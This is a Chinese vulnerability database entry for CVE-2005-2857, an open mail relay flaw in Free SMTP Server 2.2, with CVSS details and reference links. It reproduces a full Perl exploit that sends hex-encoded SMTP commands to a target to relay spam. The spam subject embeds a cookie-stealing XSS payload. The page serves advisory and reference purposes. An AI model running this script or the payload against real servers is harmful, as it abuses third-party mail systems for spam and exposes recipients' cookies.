CVE-2005-2857
CVSS7.5
发布时间 :2005-09-08 06:03:00
修订时间 :2008-09-05 16:52:50
NMCOE    

[原文]Free SMTP Server 2.2 allows remote attackers to use the server as an open mail relay (spam proxy).


[CNNVD]SMTP Server成为开放的邮件中继服务器漏洞(CNNVD-200509-082)

        SMTP Server是一款强大易用的SMTP/POP3邮件服务器工具。
        SMTP服务器端2.2免费版允许远程攻击者将服务器作为开放的邮件中继(恶意代理服务器)。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2857
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2857
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-082
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/16698
(VENDOR_ADVISORY)  SECUNIA  16698
http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=87
(VENDOR_ADVISORY)  MISC  http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=87

- 漏洞信息

SMTP Server成为开放的邮件中继服务器漏洞
高危 未知
2005-09-08 00:00:00 2005-10-20 00:00:00
远程  
        SMTP Server是一款强大易用的SMTP/POP3邮件服务器工具。
        SMTP服务器端2.2免费版允许远程攻击者将服务器作为开放的邮件中继(恶意代理服务器)。

- 公告与补丁

        

- 漏洞信息 (1193)

Free SMTP Server <= 2.2 Spam Filter Vulnerability (EDBID:1193)
windows remote
2005-09-02 Verified
0 basher13
N/A [点击下载]
#!usr/bin/perl
#
#    FREE SMTP Spam Filter Exploit
# ------------------------------------
#  Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.softstack.com/
# 

use IO::Socket;
use Socket;

print("\n   FREE SMTP Spam Filter Exploit\n");
print(" ---------------------------------\n\n");

# Changes to own feed 
$helo = "mail.test"; # HELO
$mfrom = "[support@vuln.test]"; # MAIL FROM
$rcpto = "[root@localhost]"; # RCPT TO
$date = "11 Feb 2099 12:07:10"; # Date
$from = "Micro SEX's"; # From mailer
$subject = "Check the new version.. ®®®\n".
"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]".
"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]"; # subject spammmer

if($#ARGV < 0 | $#ARGV > 1) { 
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };

$adr = $ARGV[0];
$prt = "25";

# Don't changes this one
$act1 = "\x48\x45\x4c\x4f $helo";
$act2 = "\x4d\x41\x49\x4c \x46\x52\x4f\x4d\x3a$mfrom";
$act3 = "\x52\x43\x50\x54 f\x54\x4f\x3a$rcpto";
$act4 = "\x44\x41\x54\x41";
$act5 = "\x44\x61\x74\x65\x3a $date";

$sub = 
"\x46\x72\x6f\x6d\x3a $from".
"\x53\x75\x62\x6a\x65\x63\x74\x3a $subject\x2e".
"\x51\x55\x49\x54";

print "[+] Connect to $adr..\n";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n";
print "[+] Connected!\n";
$remote->autoflush(1);
print "[*] Send HELO..";
print $remote "$act1" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send MAIL FROM..";
print $remote "$act2" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send RCPT TO..";
print $remote "$act3" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send DATA..";
print $remote "$act4" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send DATE..";
print $remote "$act5" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send Sub Mail..";
print $remote "$sub" or die "\n[-] Error: can't send xploit code\n";
print "[OK]\n";
print "[*] QUIT..\n";
print "[+] MAIL SPAMWNED!\n\n";
close $remote;
print "press any key to exit..\n";
$bla= [STDIN];

# milw0rm.com [2005-09-02]
		

- 漏洞信息

19244
Free SMTP Server Arbitrary Mail Relay
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-09-03 Unknow
2005-09-03 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站